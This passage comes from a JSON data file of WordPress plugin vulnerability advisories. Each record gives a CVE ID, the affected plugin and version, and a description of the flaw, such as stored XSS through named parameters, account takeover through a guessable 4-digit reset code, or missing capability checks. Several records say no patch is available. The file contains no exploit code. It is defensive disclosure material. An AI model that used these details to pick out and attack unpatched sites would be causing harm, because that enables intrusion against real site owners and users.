3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/dual-button\\\/widgets\\\/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/dual-button\\\/widgets\\\/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/advanced-slider\\\/widgets\\\/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/advanced-slider\\\/widgets\\\/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2129","slug":"wpbits-addons-for-elementor","versionImpact":"1.3.4.2","description":"The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's heading widget in all versions up to, and including, 1.3.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05cd8f96-533a-4036-a01f-6ba1ad2d2b5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05cd8f96-533a-4036-a01f-6ba1ad2d2b5e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbits-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbits-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7264","slug":"build-app-online","versionImpact":"1.0.21","description":"The Build App Online plugin for WordPress is vulnerable to account takeover due to a weak password reset mechanism in all versions up to, and including, 1.0.21. This makes it possible for unauthenticated attackers to reset the password of arbitrary users by guessing an 4-digit numeric reset code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6047ae6-b1b4-4b31-aa12-560927e1040b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6047ae6-b1b4-4b31-aa12-560927e1040b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L3688\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L3688\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L3757\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L3757\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6575","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.2","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018res_width_value\u2019 parameter within the plugin's tp_page_scroll widget in all versions up to, and including, 5.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71d8a8cf-4653-4515-95ce-8d71697e189c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71d8a8cf-4653-4515-95ce-8d71697e189c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/trunk\\\/modules\\\/widgets\\\/tp_page_scroll.php#L1017\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/trunk\\\/modules\\\/widgets\\\/tp_page_scroll.php#L1017\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136509\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136509\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12590","slug":"wp-youtube-gallery","versionImpact":"1.9","description":"The WP Youtube Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-youtube-gallery\\\/trunk\\\/wpyg-class.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-youtube-gallery\\\/trunk\\\/wpyg-class.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-youtube-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-youtube-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b9e6f21-4c26-4ff8-9d0f-c66cd537fdcc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b9e6f21-4c26-4ff8-9d0f-c66cd537fdcc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23614","slug":"wp-additional-logins","versionImpact":"1.0.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nik Sudan WordPress Additional Logins allows Reflected XSS. This issue affects WordPress Additional Logins: from n\/a through 1.0.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-additional-logins\\\/vulnerability\\\/wordpress-wordpress-additional-logins-plugin-1-0-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-additional-logins\\\/vulnerability\\\/wordpress-wordpress-additional-logins-plugin-1-0-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12069","slug":"lexicata","versionImpact":"1.0.16","description":"The Lexicata plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.16. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute if they can successfully trick a user into performing an action, such as clicking on a specially crafted link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lexicata\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lexicata\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7541a595-aae4-49d2-862a-c1d1f4a1e6e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7541a595-aae4-49d2-862a-c1d1f4a1e6e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9658","slug":"school-management","versionImpact":"93.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 93.0.0. This is due to the plugin not properly validating a user's identity prior to updating their details like email and password through the mj_smgt_update_user() and mj_smgt_add_admission() functions, along with a local file inclusion vulnerability. This makes it possible for authenticated attackers, with student-level access and above, to change arbitrary user's email addresses and passwords, including administrators, and leverage that to gain access to their account. This was escalated four months ago after no response to our initial outreach, yet it still vulnerable.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5fd7bca-7754-4f83-8e51-5278e6e8cc78?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5fd7bca-7754-4f83-8e51-5278e6e8cc78?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2110","slug":"wp-compress-image-optimizer","versionImpact":"6.30.15","description":"The WP Compress \u2013 Instant Performance & Speed Optimization plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to missing capability checks on its on its AJAX functions in all versions up to, and including, 6.30.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to compromise the site in various ways depending on the specific function exploited - for example, by retrieving sensitive settings and configuration details, or by altering and deleting them, thereby disclosing sensitive information, disrupting the plugin\u2019s functionality, and potentially impacting overall site performance.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.15\\\/classes\\\/ajax.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.15\\\/classes\\\/ajax.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254259\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254259\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bb4ead4-b2ad-42b4-92a0-fb7293f6df06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bb4ead4-b2ad-42b4-92a0-fb7293f6df06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3604","slug":"flynax-bridge","versionImpact":"2.2.0","description":"The Flynax Bridge plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.2.0. This is due to the plugin not properly validating a user's identity prior to updating their details like email. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/request.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/request.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/935caa43-4c75-47ad-a631-63988e21f834?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/935caa43-4c75-47ad-a631-63988e21f834?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4392","slug":"shared-files","versionImpact":"1.7.48","description":"The Shared Files \u2013 Frontend File Upload Form & Secure File Sharing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via html File uploads in all versions up to, and including, 1.7.48 due to insufficient input sanitization and output escaping within the sanitize_file() function. This makes it possible for unauthenticated attackers to bypass the plugin\u2019s MIME-only checks and inject arbitrary web scripts in pages that will execute whenever a user accesses the html file.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/anssilaitila\\\/shared-files\\\/blob\\\/master\\\/admin\\\/class-sf-admin-allow-more-file-types.php\",\"name\":\"https:\\\/\\\/github.com\\\/anssilaitila\\\/shared-files\\\/blob\\\/master\\\/admin\\\/class-sf-admin-allow-more-file-types.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304053\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304053\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shared-files\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shared-files\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/469a9c8a-0708-4c93-99d8-e9157a1f91f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/469a9c8a-0708-4c93-99d8-e9157a1f91f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1925","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_clear_cache_of_allsites_callback function. This makes it possible for unauthenticated attackers to clear caches via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/096257a4-6ee9-41e1-8a59-4ffcd309f83c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/096257a4-6ee9-41e1-8a59-4ffcd309f83c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1844","slug":"wp-auto-republish","versionImpact":"1.5.6","description":"The RevivePress \u2013 Keep your Old Content Evergreen plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the import_data and copy_data functions in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with subscriber-level access or higher, to overwrite plugin settings and view them.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ecb518-50d6-49ad-92e4-c5a7494ced82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ecb518-50d6-49ad-92e4-c5a7494ced82?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-republish\\\/trunk\\\/includes\\\/Tools\\\/Database.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-republish\\\/trunk\\\/includes\\\/Tools\\\/Database.php#L161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-republish\\\/trunk\\\/includes\\\/Tools\\\/Database.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-republish\\\/trunk\\\/includes\\\/Tools\\\/Database.php#L148\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5763","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.2","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the video_date attribute within the plugin's Video widget in all versions up to, and including, 5.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eaf4c05-9393-4e44-abd1-8f529b7848b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eaf4c05-9393-4e44-abd1-8f529b7848b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.6\\\/modules\\\/widgets\\\/tp_video_player.php?rev=3094329#L1351\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.6\\\/modules\\\/widgets\\\/tp_video_player.php?rev=3094329#L1351\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136509\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136509\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10117","slug":"wp-crowdfunding","versionImpact":"2.1.11","description":"The WP Crowdfunding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpcf_donate shortcode in all versions up to, and including, 2.1.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7813dfdc-06e0-4fa9-aabe-b5b9772368c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7813dfdc-06e0-4fa9-aabe-b5b9772368c2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174230\\\/#file19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174230\\\/#file19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174230\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174230\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/docs.themeum.com\\\/wp-crowdfunding\\\/\",\"name\":\"https:\\\/\\\/docs.themeum.com\\\/wp-crowdfunding\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10311","slug":"external-database-based-actions","versionImpact":"0.1","description":"The External Database Based Actions plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 0.1. This is due to a missing capability check in the 'edba_admin_handle' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to update the plugin settings and log in as any existing user on the site, such as an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d41a8c39-8b06-45b2-afe4-8c695faf8cb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d41a8c39-8b06-45b2-afe4-8c695faf8cb8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/external-database-based-actions\\\/trunk\\\/lib\\\/edba-admin-ajax-controller.php?rev=1785239#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/external-database-based-actions\\\/trunk\\\/lib\\\/edba-admin-ajax-controller.php?rev=1785239#L8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10484","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.16.2","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Team' widget in all versions up to, and including, 2.16.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180325\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180325\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-gutenberg\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-gutenberg\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c218bf5e-b28b-4512-8bc7-7662b4a06f1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c218bf5e-b28b-4512-8bc7-7662b4a06f1e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11827","slug":"ootb-openstreetmap","versionImpact":"2.8.3","description":"The Out of the Block: OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ootb_query shortcode in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ootb-openstreetmap\\\/tags\\\/2.8.3\\\/includes\\\/classes\\\/Query.php#L283\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ootb-openstreetmap\\\/tags\\\/2.8.3\\\/includes\\\/classes\\\/Query.php#L283\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ootb-openstreetmap\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ootb-openstreetmap\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c67c958e-1ab2-498c-b665-73e239d0029b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c67c958e-1ab2-498c-b665-73e239d0029b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13536","slug":"1003-mortgage-application","versionImpact":"1.87","description":"The 1003 Mortgage Application plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.87. This is due the \/inc\/class\/fnm\/export.php file being publicly accessible with error logging enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1003-mortgage-application\\\/trunk\\\/inc\\\/class\\\/fnm\\\/export.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1003-mortgage-application\\\/trunk\\\/inc\\\/class\\\/fnm\\\/export.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfbc90b9-af91-49ac-ad3d-a37c17e8ba6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfbc90b9-af91-49ac-ad3d-a37c17e8ba6d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23588","slug":"best-css-compiler","versionImpact":"2.0.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WOW WordPress WOW Best CSS Compiler allows Reflected XSS. This issue affects WOW Best CSS Compiler: from n\/a through 2.0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/best-css-compiler\\\/vulnerability\\\/wordpress-wow-best-css-compiler-plugin-2-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/best-css-compiler\\\/vulnerability\\\/wordpress-wow-best-css-compiler-plugin-2-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11778","slug":"embedded-cdn","versionImpact":"1.0.0","description":"The CanadaHelps Embedded Donation Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'embedcdn' shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 